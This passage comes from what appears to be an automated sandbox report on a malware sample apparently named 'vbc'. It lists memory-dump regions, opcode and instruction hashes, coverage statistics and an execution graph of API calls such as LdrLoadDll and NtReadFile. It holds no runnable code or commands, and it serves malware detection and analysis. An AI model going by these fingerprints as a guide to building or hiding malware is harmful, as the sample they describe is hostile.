                                            • Instruction ID: 048b95394a9a14d5f47fcd59f18c11d6d906ee59500c24a9cf652d2e5377241d
                                            • Opcode Fuzzy Hash: 24b1e5f9c7f03e58a890b380d4fe1b7fc093c68c48a298c5a501b2de3ff15444
                                            • Instruction Fuzzy Hash: 8FF062754087449AEB108E16D888B63FFA8EF95764F28C45AED485B287C378EC45CBB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89345bb11626058886e71abae1f5d64ca991eeed0f78604dab03a682154cbbad
                                            • Instruction ID: 9f5c648151cac16b08f521ed2d4a40a77372d7b492e1774c102258c11a720832
                                            • Opcode Fuzzy Hash: 89345bb11626058886e71abae1f5d64ca991eeed0f78604dab03a682154cbbad
                                            • Instruction Fuzzy Hash: 3E015E30A0025ADFDB20DF64E848BACB7B1FB45304F4085E5D806A7254EB7899859F49
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bb4a101f29f0b49a1d14f7b2548e220f653aff4aedd0b6e19c64c44419ef6f03
                                            • Instruction ID: f8b05aaf34365c1cad558c9cc1c5ccfc0240e568173321d6c9e7d3014786fdda
                                            • Opcode Fuzzy Hash: bb4a101f29f0b49a1d14f7b2548e220f653aff4aedd0b6e19c64c44419ef6f03
                                            • Instruction Fuzzy Hash: DDF06D2088E3C49FC306CBA59C25A59BFB59F47104F5A00EBD084DB1B3C6280D48C352
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465092475.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_9b0000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f677ae18ac009d005be00b4feb32fc9e12aee7e8ec94d033bc714fb0d6786e47
                                            • Instruction ID: ebecff1c259f3e6117654cdc2a8e9ce8bcab93115dee88425968e2cfb300e3ac
                                            • Opcode Fuzzy Hash: f677ae18ac009d005be00b4feb32fc9e12aee7e8ec94d033bc714fb0d6786e47
                                            • Instruction Fuzzy Hash: 75F0F930D04218AFCB44DFA9CA046AEFBF5AB88315F15C5AA986893351D7719E45DA80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465092475.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_9b0000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b720c45a64c68c7e75c9e661646d7beb7c625caf27b11a4f1c7c616fc4ccfb89
                                            • Instruction ID: ad566a22623803b9c9b6ec4e53dc8079f631426268e9800c3a92870cf20df3e1
                                            • Opcode Fuzzy Hash: b720c45a64c68c7e75c9e661646d7beb7c625caf27b11a4f1c7c616fc4ccfb89
                                            • Instruction Fuzzy Hash: 24F09630D09254AFCB41DB78C9546AEFFB0EF49310F1485EEC868D7252D3718909DB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f20768f8ff64251ed130dcb465fb8e37dfdcafd1e9dfb977f45ec9915808777e
                                            • Instruction ID: 74951ab55e07c366086a02d4064f57558a56670e7e4e45f1f2a7810066bec95b
                                            • Opcode Fuzzy Hash: f20768f8ff64251ed130dcb465fb8e37dfdcafd1e9dfb977f45ec9915808777e
                                            • Instruction Fuzzy Hash: DBF0ED30D0A2589FC705DBB5AC40AADBBF09F43208F1981EED408A7273E7380E04CB48
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bda6901729e2d504063d784efbea6eb8e8ef2205a5c3239436ae831f0baa3cf8
                                            • Instruction ID: ed848345cf018220a15a719f0e8099272b9efff8d99ef4bdf0b2675b043d28bf
                                            • Opcode Fuzzy Hash: bda6901729e2d504063d784efbea6eb8e8ef2205a5c3239436ae831f0baa3cf8
                                            • Instruction Fuzzy Hash: BCE0ED3098E2849FCB01DBF8989069DBFF0CB06210F2010EEC584D3652D2780A8AC792
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c5cdf43db2615af89965d28d4082fbdb29643beacc801bf9a4270fd7c1e6162
                                            • Instruction ID: 43ff078fa37b7b16527a1ca319ca1f7469cb92558a0413311b22d2e4148e8bc2
                                            • Opcode Fuzzy Hash: 7c5cdf43db2615af89965d28d4082fbdb29643beacc801bf9a4270fd7c1e6162
                                            • Instruction Fuzzy Hash: 9CF0FE74E49244AFCB41DBA8A85469DBFF0EB06304F11819AC84993361D2780A86CF55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b179e8ca0b92a7803f4b176b7a88a1a1c117227a4d0b731057cb5d941654b502
                                            • Instruction ID: 5912bd012a1480dec033d04276b900abef12bbd0d11bbf95b2d0be0f6cae50cd
                                            • Opcode Fuzzy Hash: b179e8ca0b92a7803f4b176b7a88a1a1c117227a4d0b731057cb5d941654b502
                                            • Instruction Fuzzy Hash: 1EE0ED30A09018EBC704EBA9D885BAEB3F4EF06304F2600B9A40863221DB344F40DB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 608a94b953fe85d2e1c544709479f97bf3dbcc4e2957b75cd885fa43f9d23f09
                                            • Instruction ID: c91f3975b8805fc448844a53fdd26636b84862691bbbfedae2d168279f97903e
                                            • Opcode Fuzzy Hash: 608a94b953fe85d2e1c544709479f97bf3dbcc4e2957b75cd885fa43f9d23f09
                                            • Instruction Fuzzy Hash: 15F0A0309592849FCB01CBB8DC8569CBFF0EF0A210F2500EBC909C7762E2394A85CB82
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d44b909ebacde5b57ffdf8e17787b778e915f625220808440e0ab6ce41bd9b66
                                            • Instruction ID: 1971acd06f18e875ca73a1a1bbabf1347bb5bf8df14de05a01d81e8e8ede7fa2
                                            • Opcode Fuzzy Hash: d44b909ebacde5b57ffdf8e17787b778e915f625220808440e0ab6ce41bd9b66
                                            • Instruction Fuzzy Hash: 80E0DF30A45108ABCB54FFF0D412BAEB3A4DF02208F11187D9109A3262DF398E00D7D9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d39a4c78810b6c899538a9ac649dcc96f338963f231d23ea38d82144a7105335
                                            • Instruction ID: 97541f4523558699264bb9e9417d7032f1699bb15fe7c040d14d39c9f998d3a2
                                            • Opcode Fuzzy Hash: d39a4c78810b6c899538a9ac649dcc96f338963f231d23ea38d82144a7105335
                                            • Instruction Fuzzy Hash: C0E0D830A04118DBC704EBA9E881B6EB3F4DF46304F5190A9A10473221DB344E00DB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce9fa1c0682e09d3d27314720edaced3e8f865c00017a8bd62f5b0cb38ea19cb
                                            • Instruction ID: 1c6c37c95ca18641173473e120414e091da84b8a594bb580e8dabb59a9e39bb1
                                            • Opcode Fuzzy Hash: ce9fa1c0682e09d3d27314720edaced3e8f865c00017a8bd62f5b0cb38ea19cb
                                            • Instruction Fuzzy Hash: FFE0DF30A08028EBC704EFA9E942A6EB3B9DF49304F6310BEA40873620CB345E40D688
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b4f76688da9a1f75a5620bb7ba7653c8c44bd05d47dd2d466ab30b09d22886b
                                            • Instruction ID: aa7acd127d6a08389fc085983c88ee39d7f07e8fb23c33af3578b83eb7dacedd
                                            • Opcode Fuzzy Hash: 1b4f76688da9a1f75a5620bb7ba7653c8c44bd05d47dd2d466ab30b09d22886b
                                            • Instruction Fuzzy Hash: 3CE0D830A05018EBC304EBA5D945B6EB3B5DF85304FA110BEA00873220DF345E40D789
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52f2ba72fbcc2c8c2d30e08aea24127523774532a62f81c54bb6e9266db13bf0
                                            • Instruction ID: 2254c3d711cdefc8bffa2320317cad4ca3c14cde2566ab0c36e2bcdbc732f7bb
                                            • Opcode Fuzzy Hash: 52f2ba72fbcc2c8c2d30e08aea24127523774532a62f81c54bb6e9266db13bf0
                                            • Instruction Fuzzy Hash: 83E0D830A05018EBC304EBA5D441A6EB3B5DF45304F9144B9A00873220CB345E00D798
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41e717f6ade693140a31464201d90d033232b916220a5d56356991fece6172a8
                                            • Instruction ID: daf7893ffb9f2c75a15a9de4b9da477d512f8ae20cb952b7ba48741b5c102ee2
                                            • Opcode Fuzzy Hash: 41e717f6ade693140a31464201d90d033232b916220a5d56356991fece6172a8
                                            • Instruction Fuzzy Hash: 35E09B70A19255DFC745DFB895542DC7FB09B06201F3141DEC944D3752D2380A81CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465092475.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_9b0000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 63a562edc3475f8606acd14a70ae9ce176bec77388ee9287897cf6a187abc187
                                            • Instruction ID: 1463bdcf631def355f858e619753c7df0290d2de87e975e04ac4df618e391ac7
                                            • Opcode Fuzzy Hash: 63a562edc3475f8606acd14a70ae9ce176bec77388ee9287897cf6a187abc187
                                            • Instruction Fuzzy Hash: 20E0263004F258AFC321DBB4EC506EA3BB49F03210F1211CAC05497562C3300C8EC711
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b53a807ab7ae1d0e6e4f8c684c3c6a4505cd9be4bb3df3467f601abeb532553
                                            • Instruction ID: 2d00687596720c01d95094a31c1cedd898205bb07c5a65749db03274728e5af3
                                            • Opcode Fuzzy Hash: 9b53a807ab7ae1d0e6e4f8c684c3c6a4505cd9be4bb3df3467f601abeb532553
                                            • Instruction Fuzzy Hash: 58E01A30E19208EFCB04DFB8E4446AEBFB1EB49301F2082AAD809E3760D2740A91CF41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dbf98cc4a2e2b9bd2b967276c29c73d7b5991fffb08999ea1c635884b5d36c6
                                            • Instruction ID: a5b6c51bf074e0269f202762771cee5199151264d1cc60790b0306bc2ae23b86
                                            • Opcode Fuzzy Hash: 1dbf98cc4a2e2b9bd2b967276c29c73d7b5991fffb08999ea1c635884b5d36c6
                                            • Instruction Fuzzy Hash: 41E0E630D55158AECB44EBB8948569DBFB0DB05315F6401AEC50993751D7344A94CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cd4bf0f0938f4088bb91aa7ed52097ee6a42829b8910cb4847169f9a87c4919c
                                            • Instruction ID: 778517e014d699b6e68659c5114ad8bdabb2a5acdff04fd2577ddf3b2684b6b0
                                            • Opcode Fuzzy Hash: cd4bf0f0938f4088bb91aa7ed52097ee6a42829b8910cb4847169f9a87c4919c
                                            • Instruction Fuzzy Hash: 94E08630D09108EFCB14DFA4E9447ADBF70EB46301F20415DDD0523710C3300A95DB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6763af87b629978e5f77a86ca8790972bdbf6cf25d09172552cde1a272af7fc
                                            • Instruction ID: ae7b741bb8b265dced9b209043c99dbff4d50a0ac3941797f929968a82348f6c
                                            • Opcode Fuzzy Hash: e6763af87b629978e5f77a86ca8790972bdbf6cf25d09172552cde1a272af7fc
                                            • Instruction Fuzzy Hash: 18D0A73068E019AFC304DBA8A9506BF77588B02315F5001EE990953BA1C6350D92C366
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465092475.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_9b0000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c4c4202d1d2a030f942914e929912ad0af617aaf2ad5f3968d0844ab5818ed82
                                            • Instruction ID: 641978045498c4e2b3e5a9c810adb32cbede434a96474b8751b514346b867cf9
                                            • Opcode Fuzzy Hash: c4c4202d1d2a030f942914e929912ad0af617aaf2ad5f3968d0844ab5818ed82
                                            • Instruction Fuzzy Hash: 2AD0223044F20CFBC320EBA8E904BBBB36CC742224F11009CC60813220CB300E84C6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465811746.0000000001002000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                            • Associated: 00000004.00000002.465805228.0000000001000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.466298890.00000000010AA000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1000000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            • Opcode ID: 8c6ce40efe230dc7eefba797889f6151539ed045ed1c427ffce63c13b71532bc
                                            • Instruction ID: 942ac0066d923ec2112f396691e036e3bcd5fd37c0b1984738652964d7d68667
                                            • Opcode Fuzzy Hash: 8c6ce40efe230dc7eefba797889f6151539ed045ed1c427ffce63c13b71532bc
                                            • Instruction Fuzzy Hash: 1063DD6140F7C25FDB138BB85CB5291BFB19E57214B1E49CBC4C0CF0A3E219696ADB26
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465811746.0000000001002000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                            • Associated: 00000004.00000002.465805228.0000000001000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.466298890.00000000010AA000.00000002.00020000.sdmp Download File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1000000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ab1b1d026c8585063947cb11f3cd00638b8becea5a481fd0a73e919d2159618
                                            • Instruction ID: 7e73688b8eb09dbad0a5613f430cbfa544490959078ef1649c04eea7d0d595f2
                                            • Opcode Fuzzy Hash: 4ab1b1d026c8585063947cb11f3cd00638b8becea5a481fd0a73e919d2159618
                                            • Instruction Fuzzy Hash: 7963DF6290E7C29FEB075B785CB12A5BFB1AE53214B1E44C7C4C0CF0E7E209596AD726
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Q*DN
                                            • API String ID: 0-1650365051
                                            • Opcode ID: f1bcffc9af46534a450ec8f8dbc788334104776833ee8c09b8c85a8aea1be146
                                            • Instruction ID: 4b8c79ad7afe587d1d3b5e96dbd03420a8d552456bb2ef03a61eddeb5be9aa89
                                            • Opcode Fuzzy Hash: f1bcffc9af46534a450ec8f8dbc788334104776833ee8c09b8c85a8aea1be146
                                            • Instruction Fuzzy Hash: BDA1A2B0E406299FDBA0DF69C8846CDBBF1EF89310F1585D9D188A7205EB309E95CF16
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75fea585143595e952ac16bdcfa959545a5fbc43af811933d8ba1622fe4d173a
                                            • Instruction ID: cfedce3b5598f2915c865deb4f4377796b0c7bde46f3dffecf395a4d372a10e3
                                            • Opcode Fuzzy Hash: 75fea585143595e952ac16bdcfa959545a5fbc43af811933d8ba1622fe4d173a
                                            • Instruction Fuzzy Hash: F7B176A1A8E3C16FE70386345CFA189BFA29D4312435FCADFC4C64B893D558494BEB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0c97c754a83da518a0c62b999a41e8f7bc36b36a44f0aa653594a554db84692
                                            • Instruction ID: 605a1db0ad0384155603c3f4f757c7f51ca71c4d168e777eb65488a701f1802c
                                            • Opcode Fuzzy Hash: e0c97c754a83da518a0c62b999a41e8f7bc36b36a44f0aa653594a554db84692
                                            • Instruction Fuzzy Hash: 41514D30A102498FDB44EFB9D844B9E7BF2AFC5344F04C939D504EB368EBB599068B81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bab32f9c195b7b89f1f61db2acf1a00d5bfddd1d8ea911d3ac2acae67a1248a5
                                            • Instruction ID: 10674c8f16945aa933034ca6f20151b5426aa2ed66d29b671a4df039621cf6ac
                                            • Opcode Fuzzy Hash: bab32f9c195b7b89f1f61db2acf1a00d5bfddd1d8ea911d3ac2acae67a1248a5
                                            • Instruction Fuzzy Hash: CA514C30A102498FDB44EFBAD844B9EBBF2AFC5344F04C939D504AB369EB7599058B81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f01411f1bd6d159c9fef41931616440808fd5a12937dadd34360491e4a519eb3
                                            • Instruction ID: 1f77347193ea777eb15e5b007bb5ff4dd90cdd75d2666427b24b2d650ac3bc11
                                            • Opcode Fuzzy Hash: f01411f1bd6d159c9fef41931616440808fd5a12937dadd34360491e4a519eb3
                                            • Instruction Fuzzy Hash: AA4120B1E016588BEB2CCF6B9D4078AFAF7AFC9300F14C1BA850CA6215EB7059859F55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.465765043.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_fa0000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4486c89b858c653fba0bdfa3ee002100c1486a3a3acb6a91f05baf188f2f818d
                                            • Instruction ID: 725d81ff829c321c21298e71ec719617b5ad77c1698839a07c14bc56c1d78cad
                                            • Opcode Fuzzy Hash: 4486c89b858c653fba0bdfa3ee002100c1486a3a3acb6a91f05baf188f2f818d
                                            • Instruction Fuzzy Hash: B94111B1E016588BEB6CCF6B9D4079EFAF3AFC5300F14C1BA890DAA215EB7005859F15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:2.9%
                                            Dynamic/Decrypted Code Coverage:3.8%
                                            Signature Coverage:6.1%
                                            Total number of Nodes:553
                                            Total number of Limit Nodes:72

                                            Graph

                                            execution_graph 45313 41ebb0 45316 41b360 45313->45316 45317 41b386 45316->45317 45324 409d10 45317->45324 45319 41b392 45320 41b3b3 45319->45320 45332 40c190 45319->45332 45322 41b3a5 45368 41a0a0 45322->45368 45325 409d1d 45324->45325 45371 409c60 45324->45371 45327 409d24 45325->45327 45383 409c00 45325->45383 45327->45319 45333 40c1b5 45332->45333 45790 40b190 45333->45790 45335 40c20c 45794 40ae10 45335->45794 45337 40c232 45367 40c483 45337->45367 45803 414360 45337->45803 45339 40c277 45339->45367 45806 408a40 45339->45806 45341 40c2bb 45341->45367 45814 419ef0 45341->45814 45345 40c311 45346 40c318 45345->45346 45826 419a00 45345->45826 45348 41b7b0 2 API calls 45346->45348 45350 40c325 45348->45350 45350->45322 45351 40c362 45352 41b7b0 2 API calls 45351->45352 45353 40c369 45352->45353 45353->45322 45354 40c372 45355 40f460 3 API calls 45354->45355 45356 40c3e6 45355->45356 45356->45346 45357 40c3f1 45356->45357 45358 41b7b0 2 API calls 45357->45358 45359 40c415 45358->45359 45831 419a50 45359->45831 45362 419a00 2 API calls 45363 40c450 45362->45363 45363->45367 45836 419810 45363->45836 45366 41a0a0 2 API calls 45366->45367 45367->45322 45369 41a0bf ExitProcess 45368->45369 45370 41a950 LdrLoadDll 45368->45370 45370->45369 45372 409c73 45371->45372 45422 418770 LdrLoadDll 45371->45422 45402 418620 45372->45402 45375 409c7c 45376 409c86 45375->45376 45405 41aca0 45375->45405 45376->45325 45378 409cc3 45378->45376 45416 409a80 45378->45416 45380 409ce3 45423 409600 LdrLoadDll 45380->45423 45382 409cf5 45382->45325 45384 409c1a 45383->45384 45385 41af90 LdrLoadDll 45383->45385 45765 41af90 45384->45765 45385->45384 45388 41af90 LdrLoadDll 45389 409c41 45388->45389 45390 40f140 45389->45390 45391 40f159 45390->45391 45773 40b010 45391->45773 45393 40f16c 45777 419bd0 45393->45777 45396 409d35 45396->45319 45398 40f192 45399 40f1bd 45398->45399 45783 419c50 45398->45783 45401 419e80 2 API calls 45399->45401 45401->45396 45424 419ff0 45402->45424 45406 41acb9 45405->45406 45437 414a10 45406->45437 45408 41acd1 45409 41acda 45408->45409 45476 41aae0 45408->45476 45409->45378 45411 41acee 45411->45409 45494 4198f0 45411->45494 45419 409a9a 45416->45419 45743 407e80 45416->45743 45418 409aa1 45418->45380 45419->45418 45756 408140 45419->45756 45422->45372 45423->45382 45425 418635 45424->45425 45427 41a950 45424->45427 45425->45375 45428 41a960 45427->45428 45429 41a982 45427->45429 45431 414e10 45428->45431 45429->45425 45432 414e1e 45431->45432 45433 414e2a 45431->45433 45432->45433 45436 415290 LdrLoadDll 45432->45436 45433->45429 45435 414f7c 45435->45429 45436->45435 45438 414d45 45437->45438 45448 414a24 45437->45448 45438->45408 45441 414b50 45505 419d50 45441->45505 45442 414b33 45562 419e50 LdrLoadDll 45442->45562 45445 414b77 45447 41b7b0 2 API calls 45445->45447 45446 414b3d 45446->45408 45450 414b83 45447->45450 45448->45438 45502 419640 45448->45502 45449 414d09 45452 419e80 2 API calls 45449->45452 45450->45446 45450->45449 45451 414d1f 45450->45451 45456 414c12 45450->45456 45571 414750 LdrLoadDll NtReadFile NtClose 45451->45571 45453 414d10 45452->45453 45453->45408 45455 414d32 45455->45408 45457 414c79 45456->45457 45459 414c21 45456->45459 45457->45449 45458 414c8c 45457->45458 45564 419cd0 45458->45564 45461 414c26 45459->45461 45462 414c3a 45459->45462 45563 414610 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 45461->45563 45465 414c57 45462->45465 45466 414c3f 45462->45466 45465->45453 45520 4143d0 45465->45520 45508 4146b0 45466->45508 45468 414c30 45468->45408 45470 414cec 45568 419e80 45470->45568 45471 414c4d 45471->45408 45473 414c6f 45473->45408 45475 414cf8 45475->45408 45478 41aaf1 45476->45478 45477 41ab03 45477->45411 45478->45477 45589 41b730 45478->45589 45480 41ab24 45593 414030 45480->45593 45482 41ab70 45482->45411 45483 41ab47 45483->45482 45484 414030 3 API calls 45483->45484 45486 41ab69 45484->45486 45486->45482 45618 415350 45486->45618 45487 41abfa 45488 41ac0a 45487->45488 45712 41a8f0 LdrLoadDll 45487->45712 45628 41a760 45488->45628 45491 41ac38 45707 4198b0 45491->45707 45495 41990c 45494->45495 45496 41a950 LdrLoadDll 45494->45496 45739 a3fae8 LdrInitializeThunk 45495->45739 45496->45495 